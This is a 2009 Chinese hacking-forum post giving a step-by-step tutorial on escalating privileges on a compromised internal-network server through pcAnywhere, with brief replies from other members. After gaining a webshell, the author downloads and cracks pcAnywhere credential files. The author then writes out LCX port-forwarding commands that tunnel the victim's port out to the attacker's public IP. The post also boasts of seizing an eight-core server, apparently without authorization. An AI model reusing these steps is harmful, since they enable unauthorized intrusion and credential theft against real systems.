Board logo

标题: [原创文章] pcanywhere之内网提权 [打印本页]

作者: huar    时间: 2009-7-5 21:35     标题: pcanywhere之内网提权

很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
; p" r, z3 o9 V5 O1 i- B* Q. E) \# X3 |  c, `% q
提权方法:pcanywhere+LCX
8 ]( G- t, F5 @! ^6 i& P
/ E4 `* _! z1 z6 `: I' g2 G6 N获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。; x  ?& B9 \3 m, p$ J6 j& x
5 u, r# u7 W' m
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
$ K' L7 y! @+ t( K/ Y, T
  i; f) {. M5 R- o. h/ j8 d[attach]1548[/attach]; F9 \  M% C( G# b7 l0 Q: q
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
) [8 }9 m9 y) ?6 |) M  Z2 P
* ~) G! v6 y4 v( @[attach]1549[/attach], }4 A# C- Q. e/ P+ X: y0 f: p
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。- g$ A$ X% {% }- @$ e

$ u9 d5 S+ g% M" ^[attach]1550[/attach]
" L) @2 t4 H0 j% T) T& C0 s$ O8 e1 u
0 p. _6 K3 r4 O7 D* g  r9 D- [[attach]1551[/attach]
; I. f" i2 z' y由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
, h/ P- c* T/ c9 D
: g( z  H5 R$ x/ w/ U$ A+ G[attach]1552[/attach]
5 h( k- ]8 R# ^3 Y. h6 j2 HLCX的用法再简单说下:! z0 k3 I. D) J  u9 v, z

8 s# X$ k" ^4 l# e8 g服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
+ p1 ~2 ?7 C" Y! \
1 M4 H+ }1 s& W" \, x- p+ f, X本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
4 L  T; Y+ n2 s$ {0 Y, G4 ]* q$ x
9 c9 K/ I" ?1 q+ X8 |6 i由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。; y) D2 t) y8 |( \
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
9 V# u  F; i4 w) [: T1 Y0 t3 X4 B/ H5 }/ O. z/ L/ |7 n0 h
[attach]1553[/attach]4 ?# Y. ~: J# h. H1 E

: [+ `1 I( \$ I6 h[attach]1554[/attach]4 t8 c  _4 D, a( `! J
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。$ h6 f, |9 t2 V# ~' S, O6 p

5 g6 t5 ^+ j% o1 P: @: B' c[attach]1555[/attach]
, P4 e/ j+ l  G& k: v, N& |8 j; @* j+ t. F" ^" l. K& b
[attach]1556[/attach]* f  V5 p% D7 c5 O& E1 o4 ~
我们本地连接试试,输入我们刚破解的账号密码. O  K& i8 u9 g  j# m; b5 i

' A# h4 I7 ~8 c" p* s[attach]1557[/attach]6 b4 K) w2 f; _5 D6 n; o: O, W
呵呵``连接成功,服务器不错,又一个8核^︵^
; g# E  @* k& y8 O
; Q! X: N& S6 k6 P3 ?! }: p8 C# e[attach]1558[/attach]$ h  S8 x  S: f2 l  |. S+ x
0 }- P1 f( ~& y; t
[attach]1559[/attach]
作者: 柔肠寸断    时间: 2009-7-5 21:37

不错不错。。。你的貌似一直都是内网服务器哈
作者: huar    时间: 2009-7-5 21:41

哎。。。。运气不佳```老碰见内网的。。。。
作者: gassiori    时间: 2009-7-6 09:50

八核的哟
作者: 柔肠寸断    时间: 2009-12-15 15:36

顶起。。。。。。。。。
作者: killadmin    时间: 2010-1-21 20:01

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.




欢迎光临 【3.A.S.T】网络安全爱好者 (http://www.3ast.com/) Powered by Discuz! 7.2